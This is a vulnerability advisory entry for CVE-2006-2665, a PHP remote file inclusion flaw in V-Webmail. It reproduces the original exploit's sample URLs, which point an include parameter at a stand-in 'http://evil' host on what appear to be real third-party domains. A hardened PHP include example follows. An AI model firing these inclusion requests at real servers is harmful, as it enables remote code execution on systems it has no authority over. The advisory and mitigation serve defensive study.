V-Webmail core.php PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1110334    Vulnerability type: Input validation
Published: 2006-05-25    Updated: 2006-05-30
CVE: CVE-2006-2665    CNNVD ID: CNNVD-200605-538
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/1827
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-538
|Vulnerability details
The file includes/mailaccess/pop3/core.php in V-Webmail 1.3 contains a PHP remote file inclusion vulnerability: a remote attacker can execute arbitrary PHP code by supplying a URL in the CONFIG[pear_dir] parameter.
|Exploit
Script: V-Webmail 1.6.4
Vendor: http://www.v-webmail.org/
Description: V-webmail is a powerful PHP-based webmail application with an
abundance of features, including many innovative ideas for web applications.
Discovered: beford <xbefordx gmail com>
Vulnerable File

v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] . '*.php');
v-webmail/includes/mailaccess/pop3.php =>
require_once($CONFIG['pear_dir'] . 'Net/POP3.php');

Version 1.3
http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil

Version 1.5  - 1.6.4
http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil

# milw0rm.com [2006-05-25]
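The include pattern quoted above takes its directory from `$CONFIG['pear_dir']`, which register_globals lets a query-string parameter populate before the include runs. The following is an added example (not V-Webmail's own code) showing that pattern next to a hardened form that derives the directory from a constant and verifies the resolved path; the PEAR location `includes/pear/` under the application root is an assumption.

```php
<?php
// Added example, not part of V-Webmail. Assumed layout: includes/pear/ under the app root.
//
// Vulnerable pattern from the advisory: with register_globals on, a request carrying
// CONFIG[pear_dir]=http://... fills $CONFIG before this line, and require_once then
// fetches and executes the remote script (allow_url_fopen / allow_url_include permitting).
//   require_once($CONFIG['pear_dir'] . 'Net/POP3.php');
//
// Hardened version: never take the base directory from request-controlled state,
// and check the resolved path before including it. register_globals=Off and
// allow_url_fopen/allow_url_include=Off in php.ini are the matching ini-level mitigations.

define('APP_ROOT', realpath(__DIR__));
define('PEAR_DIR', APP_ROOT . '/includes/pear/');

function safe_require(string $baseDir, string $relative): void
{
    // Accept only plain relative names such as Net/POP3.php: no scheme, no "..", no NUL.
    if (!preg_match('#^[A-Za-z0-9_]+(/[A-Za-z0-9_]+)*\.php$#', $relative)) {
        throw new RuntimeException("Refusing to include '$relative'");
    }
    $root = realpath($baseDir);
    if ($root === false) {
        throw new RuntimeException("Base directory '$baseDir' does not exist");
    }
    // realpath() returns false for missing files and for URL stream wrappers;
    // the prefix check stops traversal out of the PEAR directory via symlinks or "..".
    $resolved = realpath($baseDir . $relative);
    if ($resolved === false || strpos($resolved, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("Include path '$relative' resolves outside " . $root);
    }
    require_once $resolved;
}

// Re-initialise $CONFIG from trusted values so a register_globals override cannot
// survive to the include; the request may set $CONFIG['pear_dir'], but it is overwritten.
$CONFIG = array('pear_dir' => PEAR_DIR);
safe_require($CONFIG['pear_dir'], 'Net/POP3.php');
```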
|References

BID 30164: http://www.securityfocus.com/bid/30164
VUPEN ADV-2006-1989: http://www.frsirt.com/english/advisories/2006/1989
SECTRACK 1016160: http://securitytracker.com/id?1016160
SECUNIA 20297: http://secunia.com/advisories/20297
MILW0RM 1827: http://milw0rm.com/exploits/1827
XF vwebmail-pop3-file-include(26694): http://xforce.iss.net/xforce/xfdb/26694